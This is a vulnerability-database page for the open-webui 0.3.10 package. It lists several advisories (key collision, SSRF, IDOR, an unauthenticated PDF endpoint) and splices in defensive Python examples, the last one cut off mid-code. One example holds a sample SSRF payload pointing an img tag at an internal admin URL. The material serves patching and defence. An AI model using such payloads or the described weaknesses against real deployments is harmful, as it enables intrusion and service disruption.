Lookup for vulnerable packages by Package URL.

Purl pkg:pypi/open-webui@0.3.10
Type pypi
Namespace
Name open-webui
Version 0.3.10
Qualifiers
Subpath
Is_vulnerable true
Next_non_vulnerable_version 0.9.5
Latest_non_vulnerable_version 0.9.5
Affected_by_vulnerabilities
0
url VCID-14xt-qwyg-w3cj
vulnerability_id VCID-14xt-qwyg-w3cj
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the tool_servers and terminal_servers keys in utils/tools.py do not use a prefix. When two or more Open WebUI instances share a Redis database (a supported and documented deployment pattern, e.g., for multi-region deployments, blue-green setups, or cluster topologies), the unprefixed keys collide. An admin on Instance A writing to tool_servers overwrites the value read by Instance B, so Instance B's users receive Instance A's tool server configuration. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44552
reference_id
reference_type
scores
0
value 0.00037
scoring_system epss
scoring_elements 0.11456
published_at 2026-06-14T12:55:00Z
1
value 0.00037
scoring_system epss
scoring_elements 0.1142
published_at 2026-06-11T12:55:00Z
2
value 0.00037
scoring_system epss
scoring_elements 0.1149
published_at 2026-06-13T12:55:00Z
3
value 0.00037
scoring_system epss
scoring_elements 0.11496
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44552
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44552
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44552
3
reference_url https://github.com/advisories/GHSA-3x8w-4f7p-xxc2
reference_id GHSA-3x8w-4f7p-xxc2
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-3x8w-4f7p-xxc2
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-3x8w-4f7p-xxc2
reference_id GHSA-3x8w-4f7p-xxc2
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-19T03:55:41Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-3x8w-4f7p-xxc2
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-44552, GHSA-3x8w-4f7p-xxc2
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-14xt-qwyg-w3cj
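The key collision described in the summary above, as an added example that is not part of this page or of Open WebUI's code: two instances share one Redis database, and a bare key such as tool_servers is overwritten by whichever admin saved last, while a per-instance prefix keeps the values apart. The dict-backed FakeRedis stands in for a redis-py client so the example runs offline (it mimics only the get/set/scan_iter calls used here), and the "owui:" prefix is a placeholder, not the naming 0.9.0 actually uses.

```python
"""Added example, not Open WebUI's own code: unprefixed keys collide between
instances sharing one Redis database; a per-instance prefix isolates them."""

import fnmatch
from typing import Dict, Iterator, List, Optional


class FakeRedis:
    """Constructed in-memory stand-in for the Redis database both instances share."""

    def __init__(self) -> None:
        self._data: Dict[str, str] = {}

    def set(self, key: str, value: str) -> None:
        self._data[key] = value

    def get(self, key: str) -> Optional[str]:
        return self._data.get(key)

    def scan_iter(self, match: str = "*") -> Iterator[str]:
        for key in list(self._data):
            if fnmatch.fnmatch(key, match):
                yield key


class ConfigStore:
    """One instance's view of shared settings such as tool_servers.

    key_prefix="" reproduces the pre-0.9.0 behaviour: every instance reads and
    writes the same bare key, so the last admin to save wins for all of them.
    """

    def __init__(self, client: FakeRedis, key_prefix: str = "") -> None:
        self.client = client
        self.key_prefix = key_prefix

    def _key(self, name: str) -> str:
        return f"{self.key_prefix}{name}"

    def set_tool_servers(self, value: str) -> None:
        self.client.set(self._key("tool_servers"), value)

    def get_tool_servers(self) -> Optional[str]:
        return self.client.get(self._key("tool_servers"))


def collision_demo(prefix_a: str, prefix_b: str) -> Optional[str]:
    """Instance A saves its tool server list; return what instance B reads afterwards."""
    shared = FakeRedis()
    instance_a = ConfigStore(shared, prefix_a)
    instance_b = ConfigStore(shared, prefix_b)
    instance_b.set_tool_servers("https://tools.b.example/")   # B's own config
    instance_a.set_tool_servers("https://tools.a.example/")   # an admin on A saves
    return instance_b.get_tool_servers()


def unprefixed_keys(client: FakeRedis, expected_prefix: str) -> List[str]:
    """Audit helper: keys in the shared database that lack the agreed prefix."""
    return sorted(k for k in client.scan_iter("*") if not k.startswith(expected_prefix))


def audit_demo() -> List[str]:
    """A prefixed instance and a bare-key writer using the same database."""
    shared = FakeRedis()
    ConfigStore(shared, "owui:a:").set_tool_servers("https://tools.a.example/")
    ConfigStore(shared).set_tool_servers("https://legacy.example/")   # pre-0.9.0 style writer
    return unprefixed_keys(shared, "owui:")


if __name__ == "__main__":
    print("no prefix :", collision_demo("", ""))                 # B now serves A's config
    print("prefixed  :", collision_demo("owui:a:", "owui:b:"))   # isolated
    print("stray keys:", audit_demo())
```

Against a live deployment the same audit is `redis-cli --scan` piped through a filter for keys that lack your prefix; finding a bare tool_servers or terminal_servers key in a database shared by several instances is the signature of the condition above, and it is also worth confirming that the other keys the instances share are prefixed consistently.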
1
url VCID-1g27-4vq6-7kdz
vulnerability_id VCID-1g27-4vq6-7kdz
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, Pin/Unpin is a write operation (it modifies the message's is_pinned, pinned_by and pinned_at fields), but in standard channels it only checks read permission, allowing users with read-only access to pin or unpin any message. This vulnerability is fixed in 0.9.5.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45386
reference_id
reference_type
scores
0
value 0.00036
scoring_system epss
scoring_elements 0.11183
published_at 2026-06-14T12:55:00Z
1
value 0.00036
scoring_system epss
scoring_elements 0.11159
published_at 2026-06-11T12:55:00Z
2
value 0.00036
scoring_system epss
scoring_elements 0.11216
published_at 2026-06-13T12:55:00Z
3
value 0.00036
scoring_system epss
scoring_elements 0.11225
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45386
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45386
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45386
3
reference_url https://github.com/advisories/GHSA-5gc6-xhv4-2wg6
reference_id GHSA-5gc6-xhv4-2wg6
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-5gc6-xhv4-2wg6
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-5gc6-xhv4-2wg6
reference_id GHSA-5gc6-xhv4-2wg6
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-19T12:32:38Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-5gc6-xhv4-2wg6
fixed_packages
0
url pkg:pypi/open-webui@0.9.5
purl pkg:pypi/open-webui@0.9.5
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.5
aliases CVE-2026-45386, GHSA-5gc6-xhv4-2wg6
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-1g27-4vq6-7kdz
2
url VCID-1svn-zazq-e3f2
vulnerability_id VCID-1svn-zazq-e3f2
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.5.11, there is a blind server side request forgery (SSRF) via the PDF generate function. In the PDF export, user inputs are interpreted as HTML and embedded into the PDF. In testing, scripts and some potentially dangerous tags (iframe, object, etc.) were blocked, preventing server-side content from being read through this vulnerability. However, an image tag can still be used to force a server-side request (SSRF). This vulnerability is fixed in 0.5.11.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45347
reference_id
reference_type
scores
0
value 0.0003
scoring_system epss
scoring_elements 0.09067
published_at 2026-06-12T12:55:00Z
1
value 0.0003
scoring_system epss
scoring_elements 0.09057
published_at 2026-06-14T12:55:00Z
2
value 0.0003
scoring_system epss
scoring_elements 0.09019
published_at 2026-06-11T12:55:00Z
3
value 0.0003
scoring_system epss
scoring_elements 0.09069
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45347
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/commit/167c8bf00d165af523acfc3b870749f6be6d3e57
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/commit/167c8bf00d165af523acfc3b870749f6be6d3e57
3
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.5.11
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/releases/tag/v0.5.11
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45347
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45347
5
reference_url https://github.com/advisories/GHSA-f776-fp4w-266c
reference_id GHSA-f776-fp4w-266c
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-f776-fp4w-266c
6
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-f776-fp4w-266c
reference_id GHSA-f776-fp4w-266c
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-18T12:51:06Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-f776-fp4w-266c
fixed_packages
0
url pkg:pypi/open-webui@0.5.11
purl pkg:pypi/open-webui@0.5.11
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2rs8-62x1-s7h7
4
vulnerability VCID-2xdz-v8cw-fygv
5
vulnerability VCID-32yb-vsfs-43a8
6
vulnerability VCID-3436-znsq-guds
7
vulnerability VCID-4rz6-hw32-jueb
8
vulnerability VCID-4sn4-mrbm-dfgh
9
vulnerability VCID-4v8w-kv6g-kkbc
10
vulnerability VCID-4x63-8x64-d3bq
11
vulnerability VCID-5319-t7jm-y3bx
12
vulnerability VCID-5jna-wvd7-j7cm
13
vulnerability VCID-5wfg-zqcy-c7ar
14
vulnerability VCID-5wzn-mfwg-ybc3
15
vulnerability VCID-66zh-9jk7-9bfx
16
vulnerability VCID-6rbm-rm25-hqgy
17
vulnerability VCID-7j5a-pu4k-kucf
18
vulnerability VCID-7nbc-ng1s-suck
19
vulnerability VCID-8n6u-wgz9-1bgj
20
vulnerability VCID-8nzh-cpda-dkca
21
vulnerability VCID-8y4k-pj2n-8uhm
22
vulnerability VCID-94nj-qkdf-xfhn
23
vulnerability VCID-9jud-sr2a-8yc3
24
vulnerability VCID-chug-ma8r-cucc
25
vulnerability VCID-cw4k-3s8z-uqh8
26
vulnerability VCID-dz6g-jgmg-wqce
27
vulnerability VCID-dzh3-rqx4-fqhv
28
vulnerability VCID-ef1t-pxjm-j7cz
29
vulnerability VCID-gw77-ux3j-qfaa
30
vulnerability VCID-hj5f-yk3y-ffdg
31
vulnerability VCID-jfs9-dps1-27a2
32
vulnerability VCID-jnsg-u9dy-r3d5
33
vulnerability VCID-k17g-bd9g-67f7
34
vulnerability VCID-k9jf-5jzd-pkge
35
vulnerability VCID-mn21-kwuu-w7by
36
vulnerability VCID-n4ma-zcpv-5fbp
37
vulnerability VCID-nxvm-97r4-6ybz
38
vulnerability VCID-pkds-1xgn-q3bv
39
vulnerability VCID-pvep-chj7-ekeg
40
vulnerability VCID-pwsg-72yy-quhk
41
vulnerability VCID-q682-k826-efhv
42
vulnerability VCID-qgfh-7u8n-y7c7
43
vulnerability VCID-qjt1-zxx8-r7ht
44
vulnerability VCID-r7vt-4bqm-f7hb
45
vulnerability VCID-reqw-pfm8-c7g5
46
vulnerability VCID-rhhj-rccv-87hw
47
vulnerability VCID-s625-eg1w-gfd1
48
vulnerability VCID-t571-d65a-cyb2
49
vulnerability VCID-tz2k-gazs-mqgd
50
vulnerability VCID-u25g-p4nx-gqd1
51
vulnerability VCID-ujye-g4rj-8be5
52
vulnerability VCID-um53-kf7u-kkg6
53
vulnerability VCID-vghe-uuzj-m7cu
54
vulnerability VCID-vkx3-71kv-sugt
55
vulnerability VCID-w2vd-r3hr-w3bt
56
vulnerability VCID-wb88-83cj-ffhy
57
vulnerability VCID-wcz4-vwx4-tufb
58
vulnerability VCID-yug9-shts-kufb
59
vulnerability VCID-yysb-dk2k-f7g4
60
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.5.11
aliases CVE-2026-45347, GHSA-f776-fp4w-266c
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-1svn-zazq-e3f2
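Why blocking script and iframe is not enough for the PDF export described above, as an added example that is not part of this page or of Open WebUI's code (the project's actual fix in the referenced commit may differ): a tag denylist leaves `<img>` intact, and an HTML-to-PDF renderer fetches the image source from the server's network position. The block also gives a check that lists every URL a fragment would make the renderer fetch, which is the regression test to keep whichever fix is chosen. The denylist regex and the sample chat message are constructed for the illustration.

```python
"""Added example, not Open WebUI's own code: a tag denylist versus escaping,
judged by which URLs an HTML-to-PDF renderer would still fetch."""

import html
import re
from html.parser import HTMLParser
from typing import List, Tuple
from urllib.parse import urlsplit

# Tag/attribute pairs a renderer resolves while laying out the page. The request
# is made by the server, from the server's network position: the SSRF primitive.
FETCHING_ATTRS = {("img", "src"), ("link", "href"), ("source", "src"), ("video", "poster")}

_DENYLIST = re.compile(r"<(script|iframe|object|embed)\b.*?</\1\s*>", re.I | re.S)


def denylist_strip(fragment: str) -> str:
    """The weak, pre-fix style of filter: drop a few known-bad elements, keep the rest."""
    return _DENYLIST.sub("", fragment)


def escape_for_pdf(user_text: str) -> str:
    """Hardened rendering: chat content is text, so it is escaped, never parsed as markup."""
    return "<p>" + html.escape(user_text, quote=True).replace("\n", "<br>") + "</p>"


class _FetchFinder(HTMLParser):
    def __init__(self) -> None:
        super().__init__()
        self.fetches: List[Tuple[str, str]] = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if (tag, name) in FETCHING_ATTRS and value:
                url = value.strip()
                if urlsplit(url).scheme.lower() in ("http", "https"):
                    self.fetches.append((tag, url))


def remote_fetches(fragment: str) -> List[Tuple[str, str]]:
    """Every (tag, url) the renderer would request for this fragment; empty is the goal."""
    finder = _FetchFinder()
    finder.feed(fragment)
    finder.close()
    return finder.fetches


# Constructed chat message: the denylist removes the script and the iframe, the
# image survives and makes the renderer call an internal address.
SAMPLE_MESSAGE = (
    "Quarterly numbers <script>alert(1)</script>"
    '<iframe src="http://internal.example/"></iframe>'
    '<img src="http://internal.example:8080/admin/health">'
)

if __name__ == "__main__":
    print("denylist :", remote_fetches(denylist_strip(SAMPLE_MESSAGE)))   # one fetch left
    print("escaped  :", remote_fetches(escape_for_pdf(SAMPLE_MESSAGE)))   # []
```

Escaping everything is the simplest safe default. If the export has to keep rich formatting, the alternatives are an allowlisting HTML sanitizer plus a renderer configured not to load remote resources at all; in either case `remote_fetches` over the final HTML should stay empty for any user-controlled input.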
3
url VCID-1tu1-b9de-nfaa
vulnerability_id VCID-1tu1-b9de-nfaa
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, an IDOR vulnerability exists in the Channels feature of Open WebUI, allowing any channel member to modify messages sent by other members (including administrators) within the same channel. In the update_message_by_id function, for group or dm type channels, only the caller's membership in the channel is checked via the is_user_channel_member function, without verifying message ownership. This allows any channel member to modify messages sent by other members within the same channel. This vulnerability is fixed in 0.9.5.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45385
reference_id
reference_type
scores
0
value 0.00036
scoring_system epss
scoring_elements 0.11216
published_at 2026-06-13T12:55:00Z
1
value 0.00036
scoring_system epss
scoring_elements 0.11183
published_at 2026-06-14T12:55:00Z
2
value 0.00036
scoring_system epss
scoring_elements 0.11159
published_at 2026-06-11T12:55:00Z
3
value 0.00036
scoring_system epss
scoring_elements 0.11225
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45385
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45385
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45385
3
reference_url https://github.com/advisories/GHSA-wwhq-cx22-f7vv
reference_id GHSA-wwhq-cx22-f7vv
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-wwhq-cx22-f7vv
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-wwhq-cx22-f7vv
reference_id GHSA-wwhq-cx22-f7vv
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-18T15:56:23Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-wwhq-cx22-f7vv
fixed_packages
0
url pkg:pypi/open-webui@0.9.5
purl pkg:pypi/open-webui@0.9.5
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.5
aliases CVE-2026-45385, GHSA-wwhq-cx22-f7vv
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-1tu1-b9de-nfaa
4
url VCID-22d8-rsah-vbg2
vulnerability_id VCID-22d8-rsah-vbg2
summary In version v0.3.10 of open-webui/open-webui, the `api/v1/utils/pdf` endpoint lacks authentication mechanisms, allowing unauthenticated attackers to access the PDF generation service. This vulnerability can be exploited by sending a POST request with an excessively large payload, potentially leading to server resource exhaustion and denial of service (DoS). Additionally, unauthorized users can misuse the endpoint to generate PDFs without verification, resulting in service misuse and potential operational and financial impacts.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-8053
reference_id
reference_type
scores
0
value 0.00729
scoring_system epss
scoring_elements 0.73198
published_at 2026-06-12T12:55:00Z
1
value 0.00729
scoring_system epss
scoring_elements 0.73211
published_at 2026-06-14T12:55:00Z
2
value 0.00729
scoring_system epss
scoring_elements 0.7312
published_at 2026-06-11T12:55:00Z
3
value 0.00729
scoring_system epss
scoring_elements 0.73213
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-8053
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-8053
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-8053
3
reference_url https://huntr.com/bounties/ebe8c1fa-113b-4df9-be03-a406b9adb9f4
reference_id ebe8c1fa-113b-4df9-be03-a406b9adb9f4
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-03-20T13:10:22Z/
url https://huntr.com/bounties/ebe8c1fa-113b-4df9-be03-a406b9adb9f4
4
reference_url https://github.com/advisories/GHSA-9vf8-xgwm-97r8
reference_id GHSA-9vf8-xgwm-97r8
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-9vf8-xgwm-97r8
fixed_packages
0
url pkg:pypi/open-webui@0.3.12
purl pkg:pypi/open-webui@0.3.12
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1svn-zazq-e3f2
3
vulnerability VCID-1tu1-b9de-nfaa
4
vulnerability VCID-2rs8-62x1-s7h7
5
vulnerability VCID-2xdz-v8cw-fygv
6
vulnerability VCID-32yb-vsfs-43a8
7
vulnerability VCID-3436-znsq-guds
8
vulnerability VCID-3hv8-ys1d-63a6
9
vulnerability VCID-4rz6-hw32-jueb
10
vulnerability VCID-4sn4-mrbm-dfgh
11
vulnerability VCID-4v8w-kv6g-kkbc
12
vulnerability VCID-4x63-8x64-d3bq
13
vulnerability VCID-5319-t7jm-y3bx
14
vulnerability VCID-5jna-wvd7-j7cm
15
vulnerability VCID-5wfg-zqcy-c7ar
16
vulnerability VCID-5wzn-mfwg-ybc3
17
vulnerability VCID-66zh-9jk7-9bfx
18
vulnerability VCID-68jf-2utx-x7br
19
vulnerability VCID-6rbm-rm25-hqgy
20
vulnerability VCID-7j5a-pu4k-kucf
21
vulnerability VCID-7nbc-ng1s-suck
22
vulnerability VCID-8n6u-wgz9-1bgj
23
vulnerability VCID-8nzh-cpda-dkca
24
vulnerability VCID-8qvj-xndv-v3ay
25
vulnerability VCID-8y4k-pj2n-8uhm
26
vulnerability VCID-94nj-qkdf-xfhn
27
vulnerability VCID-9jud-sr2a-8yc3
28
vulnerability VCID-9zyk-459z-x3a4
29
vulnerability VCID-chug-ma8r-cucc
30
vulnerability VCID-cw4k-3s8z-uqh8
31
vulnerability VCID-dz6g-jgmg-wqce
32
vulnerability VCID-dzh3-rqx4-fqhv
33
vulnerability VCID-ef1t-pxjm-j7cz
34
vulnerability VCID-gw77-ux3j-qfaa
35
vulnerability VCID-hj5f-yk3y-ffdg
36
vulnerability VCID-jfs9-dps1-27a2
37
vulnerability VCID-jnsg-u9dy-r3d5
38
vulnerability VCID-k17g-bd9g-67f7
39
vulnerability VCID-k9jf-5jzd-pkge
40
vulnerability VCID-mn21-kwuu-w7by
41
vulnerability VCID-n4ma-zcpv-5fbp
42
vulnerability VCID-nxvm-97r4-6ybz
43
vulnerability VCID-pkds-1xgn-q3bv
44
vulnerability VCID-pvep-chj7-ekeg
45
vulnerability VCID-pwsg-72yy-quhk
46
vulnerability VCID-q682-k826-efhv
47
vulnerability VCID-qgfh-7u8n-y7c7
48
vulnerability VCID-qjt1-zxx8-r7ht
49
vulnerability VCID-r7vt-4bqm-f7hb
50
vulnerability VCID-reqw-pfm8-c7g5
51
vulnerability VCID-rhhj-rccv-87hw
52
vulnerability VCID-s625-eg1w-gfd1
53
vulnerability VCID-t571-d65a-cyb2
54
vulnerability VCID-tz2k-gazs-mqgd
55
vulnerability VCID-u25g-p4nx-gqd1
56
vulnerability VCID-ujye-g4rj-8be5
57
vulnerability VCID-um53-kf7u-kkg6
58
vulnerability VCID-vghe-uuzj-m7cu
59
vulnerability VCID-vj38-mn12-v7br
60
vulnerability VCID-vkx3-71kv-sugt
61
vulnerability VCID-w2vd-r3hr-w3bt
62
vulnerability VCID-wb88-83cj-ffhy
63
vulnerability VCID-wcz4-vwx4-tufb
64
vulnerability VCID-wja7-68ea-mug6
65
vulnerability VCID-yug9-shts-kufb
66
vulnerability VCID-yysb-dk2k-f7g4
67
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.3.12
aliases CVE-2024-8053, GHSA-9vf8-xgwm-97r8
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-22d8-rsah-vbg2
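The two controls the advisory above says were missing on the PDF endpoint, as an added example that is not part of this page or of Open WebUI's code: authenticate the caller first, then reject by declared body size, both before reading or rendering anything. The block serves a minimal handler on an ephemeral localhost port and probes it with raw HTTP the way a quick manual check would, so it runs offline. The bearer token, the 64 KiB limit and the JSON shape are assumptions made for the illustration.

```python
"""Added example, not Open WebUI's own code: auth and a body-size bound on the
PDF route, checked before any body is read, plus the probes that verify it."""

import http.server
import json
import socket
import threading
from http import HTTPStatus
from typing import Dict, Optional

API_TOKEN = "example-token"      # stand-in for the real session or JWT check
MAX_BODY_BYTES = 64 * 1024       # plenty for a chat transcript, fatal for a flood


class PdfHandler(http.server.BaseHTTPRequestHandler):
    def log_message(self, *args) -> None:   # keep the example quiet
        pass

    def _reply(self, status: HTTPStatus, body: bytes = b"") -> None:
        self.send_response(status)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_POST(self) -> None:
        if self.path != "/api/v1/utils/pdf":
            self._reply(HTTPStatus.NOT_FOUND)
            return
        # 1. Authenticate before anything else: anonymous callers never reach the generator.
        if self.headers.get("Authorization") != f"Bearer {API_TOKEN}":
            self._reply(HTTPStatus.UNAUTHORIZED)
            return
        # 2. Reject by declared length before reading a single body byte.
        try:
            length = int(self.headers.get("Content-Length", "0"))
        except ValueError:
            self._reply(HTTPStatus.BAD_REQUEST)
            return
        if length > MAX_BODY_BYTES:
            self._reply(HTTPStatus.REQUEST_ENTITY_TOO_LARGE)
            return
        try:
            title = str(json.loads(self.rfile.read(length))["title"])
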